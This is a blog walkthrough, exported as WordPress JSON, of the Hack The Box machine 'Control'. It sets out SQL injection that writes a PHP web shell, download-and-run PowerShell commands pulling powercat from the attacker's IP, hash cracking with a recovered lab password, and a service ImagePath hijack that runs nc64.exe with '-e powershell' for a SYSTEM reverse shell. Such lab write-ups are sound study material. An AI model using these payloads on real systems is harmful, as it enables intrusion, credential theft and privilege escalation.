{"id":49,"date":"2020-05-03T09:02:24","date_gmt":"2020-05-03T09:02:24","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=49"},"modified":"2020-05-13T12:51:45","modified_gmt":"2020-05-13T12:51:45","slug":"control-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/control-hackthebox-walkthrough\/","title":{"rendered":"Control : Hackthebox Walkthrough"},"content":{"rendered":"\n

Hey fellas!! This is Shreya Pohekar and today we\u2019ll be walking through Control from Hackthebox. It was a hard windows machine. The initial foothold (wwwroot) to the machine exploited a sql injection, where I uploaded a web shell using the vulnerability. Getting to the user was pretty straightforward as the sqlmap listed password hashes. Privilege escalation to root required us to read through a powershell history file, that retrieved us interesting commands to query registry. The user had full control over the registry services, therefore it can be abused to get an administrator shell.<\/p>\n\n\n\n

With all that said, Let\u2019s dive in!!<\/p>\n\n\n\n

Start with a nmap scan to find the open ports and services.<\/p>\n\n\n\n

# nmap -sC -sV -o control.nmap 10.10.10.167<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
From the nmap scan, we can conclude that we might get our initial foothold from http.<\/p>\n\n\n\n
So let’s jump onto the site, http:\/\/10.10.10.167<\/a> amd we get a page<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
There is a login button, but unfortunately, we cant access it. And it says to set up a proxy!!!!<\/p>\n\n\n\n
But which IP to forward the request through??<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So after viewing the page source of the launcher page, I found this!!<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I got the IP to forward the request to. So setup burp and add the X-forwarded for header and the admin.php loads.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Scrolling through the page, option to create products,categories were implemented along with a search bar.<\/p>\n\n\n\n
I found out  that there was a SQL injection on the search bar, so I manually formed queries to find out the database, users, number of tables. And got the following result<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
The database was found to be warehouse and the user was the manager.<\/p>\n\n\n\n
Alongside manual enumeration, I copied the request to a file, search.req and started a SQLMap.<\/p>\n\n\n\n
# sqlmap -r search.req –all –batch<\/p>\n\n\n\n
(–batch automates the yes\/no prompt by sqlmap)<\/p>\n\n\n\n
And found a lot of juicy stuff such as password to manager, password hash for hector and root.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
And few other password hashes<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
After getting the password for the manager, I tried taking up the remote shells with evil-winrm, psexec.py, but it didn’t worked out. So now we need to somehow upload a shell on the box to get a reverse shell.<\/p>\n\n\n\n
I got this blog<\/a> that totally served the purpose.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
But we need to find out where to upload the shell. As we know that the default document root for IIS web server is C:\\inetpub\\wwwroot, I tried that to upload the shell.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Since burp was continuously generating errors, I manipulated the payload I was using. And finally this payload worked<\/p>\n\n\n\n
‘; select “<?php  echo shell_exec($_GET[‘cmd’]);?>” into OUTFILE ‘C:\\\\inetpub\\\\wwwroot\\\\shell.php’;#<\/p>\n\n\n\n
The file gets uploaded, still it generates a general error.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Time to take a reverse shell\u2026<\/p>\n\n\n\n
I used powercat.ps1 to obtain the reverse shell.<\/p>\n\n\n\n
Just add a line to the end of the file, that is gonna execute the script.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Now go to the browser and write a command to grab the powercat.ps1 from the local machine<\/p>\n\n\n\n
10.10.10.167\/shells.php?cmd=powershell \"iex(New-Object Net.WebClient).downloadString('http:\/\/10.10.14.81\/powercat.ps1');\"<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Listen on port 443 for incoming connection and also setup a SimpleHTTPServer of python.<\/p>\n\n\n\n
As the command on the browser executes, we get a shell.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Now grab winpeas.exe using the command:<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
WinPEAS did not return any interesting results.<\/p>\n\n\n\n
But Alongside, sqlmap was completed and all the results were dumped to file inside \/root\/.sqlmap<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I tried to crack the hashes that i previously obtained of hector and root using hashcat<\/p>\n\n\n\n
Hash-identifier gave the following result<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
# hashcat --example-hashes | grep -i -B2 mysql<\/pre>\n\n\n\n
In which mode 300 looked similar to what hash-identifier identified<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
# hashcat --user -m 300 user_hashes \/usr\/share\/wordlists\/rockyou.txt --force <\/pre>\n\n\n\n
This command can be used if there are more than one password hashes  and the format is :-<\/p>\n\n\n\n
User:password_hash<\/p>\n\n\n\n
And the password cracked for hector<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Now Back to our windows machine, we again take a reverse shell with the creds of hector. This time we are creating a PSCredential which takes in username in plain text and password in encrypted format. This method is useful in the use case of login automation. You can read about PSCredential from here<\/a>.<\/p>\n\n\n\n
\n
# $pass = ConvertTo-SecureString ‘l33th4x0rhector’ -Asplain -Force<\/p>\n\n\n\n
# $cred = New-Object System.Management.Automation.PSCredential(‘.\\hector’, $pass)<\/p>\n\n\n\n
# $cred<\/p>\n<\/div><\/div>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
The hostname of the machine is Fidelity. Check it out with #hostname<\/p>\n\n\n\n
Now set up a python web server and spawn a nc listening on the specified port. The command below gives the reverse shell, but now with hector.<\/p>\n\n\n\n
# invoke-command -Computer Fidelity -Credential $cred -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http:\/\/10.10.14.81\/powercat.ps1') }<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Now we can grab our user.txt\u2026<\/p>\n\n\n\n
NOTE : Rlwrap nc -lnvp can be used in windows machine to get the arrow keys working<\/p>\n\n\n\n
So now time to root!<\/p>\n\n\n\n
Again I ran winPEAS.exe but didn’t find interesting results. Then got this file : PSReadline.<\/p>\n\n\n\n
This is a powershell history file ( similar to bash_history in linux). On listing its contents, I found 2 commands relating to registry.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
> get-childitem HKLM:\\SYSTEM\\CurrentControlset | format-list<\/pre>\n\n\n\n
The command lists all the services in the registry.<\/p>\n\n\n\n
get-childitem HKLM:\\SYSTEM\\CurrentControlset | format-list\n\n\nProperty  \t: {BootDriverFlags, CurrentUser, EarlyStartServices, PreshutdownOrder...}\nPSPath    \t: Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Control\nPSParentPath  : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\nPSChildName   : Control\nPSDrive   \t: HKLM\nPSProvider\t: Microsoft.PowerShell.Core\\Registry\nPSIsContainer : True\nSubKeyCount   : 121\nView      \t: Default\nHandle    \t: Microsoft.Win32.SafeHandles.SafeRegistryHandle\nValueCount\t: 11\nName      \t: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Control\n\nProperty  \t: {NextParentID.daba3ff.2, NextParentID.61aaa01.3, NextParentID.1bd7f811.4, NextParentID.2032e665.5...}\nPSPath    \t: Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Enum\nPSParentPath  : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\nPSChildName   : Enum\nPSDrive   \t: HKLM\nPSProvider\t: Microsoft.PowerShell.Core\\Registry\nPSIsContainer : True\nSubKeyCount   : 17\nView      \t: Default\nHandle    \t: Microsoft.Win32.SafeHandles.SafeRegistryHandle\nValueCount\t: 27\nName      \t: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Enum\n\nProperty  \t: {}\nPSPath    \t: Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Hardware Profiles\nPSParentPath  : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\nPSChildName   : Hardware Profiles\nPSDrive   \t: HKLM\nPSProvider\t: Microsoft.PowerShell.Core\\Registry\nPSIsContainer : True\nSubKeyCount   : 3\nView      \t: Default\nHandle    \t: Microsoft.Win32.SafeHandles.SafeRegistryHandle\nValueCount\t: 0\nName      \t: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Hardware Profiles\n\nProperty  \t: {}\nPSPath    \t: Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Policies\nPSParentPath  : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\nPSChildName   : Policies\nPSDrive   \t: HKLM\nPSProvider\t: Microsoft.PowerShell.Core\\Registry\nPSIsContainer : True\nSubKeyCount   : 0\nView      \t: Default\nHandle    \t: Microsoft.Win32.SafeHandles.SafeRegistryHandle\nValueCount\t: 0\nName      \t: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Policies\n\nProperty  \t: {}\nPSPath    \t: Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Services\nPSParentPath  : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\nPSChildName   : Services\nPSDrive   \t: HKLM\nPSProvider\t: Microsoft.PowerShell.Core\\Registry\nPSIsContainer : True\nSubKeyCount   : 667\nView      \t: Default\nHandle    \t: Microsoft.Win32.SafeHandles.SafeRegistryHandle\nValueCount\t: 0\nName      \t: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Services\n\nProperty  \t: {}\nPSPath    \t: Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Software\nPSParentPath  : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\nPSChildName   : Software\nPSDrive   \t: HKLM\nPSProvider\t: Microsoft.PowerShell.Core\\Registry\nPSIsContainer : True\nSubKeyCount   : 1\nView      \t: Default\nHandle    \t: Microsoft.Win32.SafeHandles.SafeRegistryHandle\nValueCount\t: 0\nName      \t: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Software\n\n<\/pre>\n\n\n\n
The get-acl cmdlet get you the  security descriptor for a resource, such as a file or registry key. The Sddl contains the Access control of the resource. <\/p>\n\n\n\n
get-acl HKLM:\\SYSTEM\\CurrentControlSet | format-list\n\n\nPath   : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\nOwner  : BUILTIN\\Administrators\nGroup  : NT AUTHORITY\\SYSTEM\nAccess : BUILTIN\\Administrators Allow  FullControl\n     \tNT AUTHORITY\\Authenticated Users Allow  ReadKey\n     \tNT AUTHORITY\\Authenticated Users Allow  -2147483648\n     \tS-1-5-32-549 Allow  ReadKey\n     \tS-1-5-32-549 Allow  -2147483648\n     \tBUILTIN\\Administrators Allow  FullControl\n     \tBUILTIN\\Administrators Allow  268435456\n     \tNT AUTHORITY\\SYSTEM Allow  FullControl\n     \tNT AUTHORITY\\SYSTEM Allow  268435456\n     \tCREATOR OWNER Allow  268435456\n     \tAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow  ReadKey\n     \tAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow  -2147483648\n     \tS-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow  \n     \tReadKey\n     \tS-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow  \n     \t-2147483648\nAudit  :\nSddl   : O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOI\n     \tD;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;S-1-15-\n     \t3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)(A;CIIOID;GR;;;S\n     \t-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)\n<\/code><\/pre>\n\n\n\n
Based on the above 2 results, I found out that Hector has full control over registry.<\/p>\n\n\n\n
As a note, commands lists SDDL\u2019s. Security Descriptor Definition Language (SDDL) is a formal way to specify Microsoft Windows  security descriptors or text strings that describe who owns various objects such as files in the system. The security descriptor may also provide an ACL for an object or its group.<\/p>\n\n\n\n
\n
# $acl = get-acl HKLM:\\System\\CurrentControlSet\\Services<\/p>\n\n\n\n
# ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights | Foreach-Object {$_.DiscretionaryAcl}<\/p>\n<\/div><\/div>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So that’s a much readable form of hector having full control over the registry services.<\/p>\n\n\n\n
\n
# cd HKLM:<\/p>\n\n\n\n
# cd SYSTEM\\CurrentControlSet\\Serivces<\/p>\n<\/div><\/div>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
We need to find all the services running as LocalSystem, so that we can modify them and get a reverse shell as NT Authority.<\/p>\n\n\n\n
The service (running as local system) should have startup type as manual and also we should have the permission to start and stop the service.<\/p>\n\n\n\n
Start : 3 (Signifies manual mode)<\/p>\n\n\n\n
ImagePath (This is from where the service loads the executables. Therefore we have to bind our shell here)<\/p>\n\n\n\n
ObjectName : LocalSystem (advantage of running under the LocalSystem account is that the service has complete unrestricted access to local resources. )<\/p>\n\n\n\n
Now, I\u2019ll be sorting the services based upon the above three described parameters.<\/p>\n\n\n\n
\n
# cd SYSTEM\\CurrentControlSet\\Services<\/p>\n\n\n\n
# $services = Get-ItemProperty -Path *<\/p>\n<\/div><\/div>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\n
# $temp = $services | where { ($_.ObjectName -match ‘LocalSystem’)}<\/p>\n\n\n\n
# $temp | select PSChildName | measure<\/p>\n<\/div><\/div>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\n
# $temp = $services | where { ($_.ObjectName -match ‘LocalSystem’) -and ($_.Start -match ‘3’) }<\/p>\n\n\n\n
# $temp | select PSChildName | measure<\/p>\n<\/div><\/div>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So after sorting, I found out that wuauserv (Windows Update Service) is one such service that matches the criteria. So let’s exploit!!<\/p>\n\n\n\n
# sc.exe sdshow wuauserv<\/pre>\n\n\n\n
The images below show the SDDL set upon the wuauserv service, which makes it exploitable.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
# ConvertFrom-SddlString -Sddl \u201cD:(A;;CCLCSWRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)\u201d | Foreach-Object {$_.DiscretionaryAcl}<\/pre>\n\n\n\n
\"\"\/
A more readable format that represents the sddl of wuauserv service<\/figcaption><\/figure>\n\n\n\n
Aftering querying the service we find out that it is stopped. That\u2019s what we wanted because Hector dont have the permission to stop the running service. <\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Grab the nc64.exe from the local machine and paste it in C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe<\/strong><\/p>\n\n\n\n
Using:<\/p>\n\n\n\n
wget http:\/\/10.10.14.81\/nc64.exe<\/a> -o nc64.exe<\/p>\n\n\n\n
 > set-itemProperty -path wuauserv -Name ImagePath -Value \"C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe 10.10.14.81 9001 -e powershell\"<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
> get-item wuauserv  (To check that our bind shell properly loaded)<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
# sc.exe start wuauserv<\/pre>\n\n\n\n
When we start the service, the binary in the ImagePath gets loaded and executed. In our case, nc.exe gets executed and connects to the listener that was spawned on the local machine using:<\/p>\n\n\n\n
# nc -lnvp 9001<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Yes it was a long way to go but the reward is worth it!!<\/p>\n\n\n\n
That’s all for the blog post. Thanks for reading!!<\/p>\n\n\n\n
Until then, Happy Hacking!!<\/p>\n\n\n\n
For more such content subscribe to my page.<\/p>\n","protected":false},"excerpt":{"rendered":"
Hey fellas!! This is Shreya Pohekar and today we\u2019ll be walking through Control from Hackthebox. It was a hard windows machine. The initial foothold (wwwroot) to the machine exploited a sql injection, where I uploaded a web shell using the vulnerability. Getting to the user was pretty straightforward as the sqlmap listed password hashes. Privilege […]<\/p>\n","protected":false},"author":1,"featured_media":55,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2],"tags":[38,26,42,40,39,41,9,45,44,43],"class_list":["post-49","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","tag-control","tag-hackthebox","tag-powershell-history","tag-registry","tag-sddl","tag-shell-upload","tag-sql-injection","tag-wuauserv","tag-wuauserv-exploit","tag-x-forwarded-for","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/49"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=49"}],"version-history":[{"count":10,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/49\/revisions"}],"predecessor-version":[{"id":139,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/49\/revisions\/139"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/55"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=49"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=49"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=49"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}